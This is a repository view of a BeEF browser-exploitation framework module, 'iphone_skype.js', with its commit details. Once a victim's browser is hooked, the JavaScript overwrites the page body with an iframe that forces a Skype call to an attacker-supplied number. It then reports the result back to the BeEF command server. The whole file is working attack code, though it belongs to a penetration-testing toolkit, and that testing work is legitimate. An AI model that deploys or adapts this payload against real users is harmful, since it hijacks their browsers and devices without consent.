Files
beef/modules/commands/host/iphone_skype/iphone_skype.js
xntrik ce79a9a12e issue 149 : iphone skype calling module
git-svn-id: https://beef.googlecode.com/svn/trunk@584 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-11-27 09:21:27 +00:00

6 lines
202 B
JavaScript

beef.execute(function() {
document.body.innerHTML = "<iframe src=skype:<%= @tel_num %>?call></iframe>";
beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
});